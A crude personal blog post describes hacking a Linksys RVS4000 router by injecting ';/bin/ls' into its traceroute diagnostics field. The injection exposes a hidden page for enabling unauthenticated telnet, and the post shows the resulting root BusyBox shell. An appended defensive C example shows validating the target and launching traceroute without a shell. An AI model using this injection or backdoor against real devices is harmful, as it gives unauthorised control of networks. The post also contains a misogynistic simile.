violating the linksys rvs4000
FTP is way the fuck broke on my gigabit router, which is past the return policy expiration date. I want to hack it but A) I'm just not that skilled in the ways of *nix; B) I'm too lazy to learn MIPS cross-compiling for Linux embedded systems (whatever the fuck that means).
So I google my incompetence as usual. Search for "rvs4000 ftp" and you get a whole lot of what you already know. The shit's broke. No one's gonna fix the shit. You're ten kinds of fucked if you want to ftp anything, ever.
So I roll a search on the processor "star 9202" which drops me a few gems of badassery:
Hacking the WRVS4400NX Stock Firmware V1.1.03 for Full Linux Shell Access
http://openwrt.org/logs/openwrt.log.20071102
Not my model - but it appears the only difference between the RVS4000 and the WRVS4400N is that the WRVS4400N has a wireless chipset - that is, a separate processor to run the wireless services with.
So they seem to be the same except one does wireless and one does not. So I go to the diagnostics pages of the administration ui and start pasting in the different commands from the "Hacking the WRV44...." post to see what happens. No dice. The ftp no longer works - probably a good thing - so I start stumbling around the web glossing over many pages of stuff about busybox. I try pasting in all kinds of shell commands into the way not secure 'Traceroute Target:' field when I happen to get a command to try off of the busybox wikipedia page: ';/bin/ls' - I paste-a-bitch and wa-la:
ARARPTable.htm AccessRes.htm Administration.htm AppGaming.htm Backup.htm DHCPClientTable.htm DMZ.htm Diagnostics.htm EditList.htm Factorydefaults.htm FirmwareUpgrade.htm Hidden_telnet.htm IM-P2P.htm IPS-N.htm LocalNetwork.htm Log.htm Ping.htm PortRangeTriggering.htm QoS.htm Quick_vpn_setup.htm RVS4000_Admin.pem RVS4000_Client.pem Reboot.htm Report_Pic-n.jpg Routercfg.cfg Routing_Table.htm Security.htm Setup.htm Setup_MAC.htm Setup_lan.htm Setup_routing.htm Setup_summary.htm Setup_time.htm Setup_wan.htm SingleForwarding.htm Status.htm Summary.htm UI_02.gif UI_03.gif UI_04.gif UI_05.gif UI_06.gif UI_07.gif UI_10.gif UI_Cisco.gif UI_Linksys.gif VPNPassthrough.htm acl.htm cisco.css down_chart.jpg err_msg func.js fw_version.pat help index.htm info.htm ip_conntrack.htm left.gif linux.js log_data.htm log_outin.htm middle.gif mm_menu.js msg.js new_rule.htm po1_0.gif po1_1.gif po2_0.gif po2_1.gif po3_0.gif po3_1.gif po4_0.gif po4_1.gif ppp_log qos_service_managment.htm quickVpnStatus.htm raw_data.htm reboot_guage.htm report.htm restore_config.cgi rh_bg.gif rh_cisco.gif right.gif rvs4000 service.htm set_vpn.js setup.cgi switch_8021x.htm switch_diagnostic.htm switch_dscp.htm switch_mirror.htm switch_param.htm switch_port.htm switch_qos.htm switch_queue.htm switch_rstp.htm switch_status.htm switch_vlan.htm switch_vlan_mem.htm switch_vlan_port.htm table.jpg table.png tr069 tracert.htm trash.gif up_chart.jpg upgrade_flash.cgi upgrade_pem.cgi upgrade_sig.cgi upload_lang.cgi vpn_adv.htm vpn_main.htm vpn_summary.htm vpnsum.htm wan_0.gif wan_1.gif
Would you check that the fuck out!?! 'Hidden_telnet.html' I (again) paste-a-bitch and HOT DAMN if I don't get some purty radio buttons. And after I click yes in the little circle and save the settings hot damn if I don't have an insecure as all holy hell no login needed telnet accessible router spread wide open and waiting like a rufied sorority pledge coed at the frat kegger... and a quick test of my dyndns enabled domain confirms that yes, I do have world facing telnet access of my router sans any security. None, nada. Zero. Luckily I can uncheck my telnet access on my hidden telnet access page and then save settings so I no longer have hidden telnet access.
    speedy:~$ telnet 192.168.0.1
    Trying 192.168.0.1...
    Connected to 192.168.0.1.
    Escape character is '^]'.

    BusyBox v1.00 (2007.09.12-05:31+0000) Built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    # help
    Built-in commands:
    -------------------
    . : break cd chdir continue eval exec exit export false hash
    help local pwd read readonly return set shift times trap true
    type ulimit umask unset wait

    # ls
    Active_ALG.list           linuxrc                   sbin
    bin                       lost+found                tmp
    dev                       nat-pt_packet_stats_log   usr
    etc                       proc                      var
    lib                       root                      www.eng
    # ls bin
    ash          df           ipaddr       mount        radvd        umount
    brctl        dhcp6-serv   iplink       nat-pt       rm           uname
    busybox      dmesg        iproute      netstat      sed          vi
    cat          echo         iptunnel     ping         sh
    chmod        flash_tools  kill         ping2file    sleep
    chown        gzip         ln           ping6        sysinfo
    cp           hostname     ls           ps           tar
    date         ip           mkdir        pwd          touch
    # exit
    Connection closed by foreign host.
Maybe I can use this knowledge to fix my ftp problem. Or to get my whole home network compromised.
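The 'Traceroute Target:' field ran ';/bin/ls' because the submitted text was handed to a shell. The following is an added example, not code from the original post or from the router's firmware: it shows how a diagnostics handler can validate the target and launch traceroute without a shell. The names is_valid_target and run_traceroute and the "assumed vulnerable pattern" in the comment are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed vulnerable pattern (an assumption, not taken from the firmware):
 *     sprintf(cmd, "traceroute %s", target); system(cmd);
 * With that, ";/bin/ls" ends the traceroute command and starts a new one. */

/* Hypothetical check: accept only what can be a hostname or IP literal.
 * Letters, digits, '.', '-' and ':' (IPv6), 1..253 characters, and no
 * leading '-' so the value can never be parsed as a traceroute option. */
int is_valid_target(const char *s)
{
    size_t n, i;
    if (s == NULL) return 0;
    n = strlen(s);
    if (n == 0 || n > 253 || s[0] == '-') return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '.' && c != '-' && c != ':') return 0;
    }
    return 1;
}

/* Hypothetical handler: returns -1 if the target is rejected or the launch
 * fails, otherwise traceroute's exit status. The target travels as a single
 * argv element, so no shell ever interprets it. */
int run_traceroute(const char *target)
{
    int status;
    pid_t pid;
    if (!is_valid_target(target)) return -1;
    pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp("traceroute", "traceroute", target, (char *)NULL);
        _exit(127);                      /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample inputs; the third is the string from the post. */
    const char *samples[] = { "192.168.0.1", "example.com", ";/bin/ls", "-h", "a b" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s %s\n", samples[i], is_valid_target(samples[i]) ? "accept" : "reject");
    return 0;
}
```

Either measure alone would have stopped the ';/bin/ls' input; using both means a gap in the character check still cannot reach a shell.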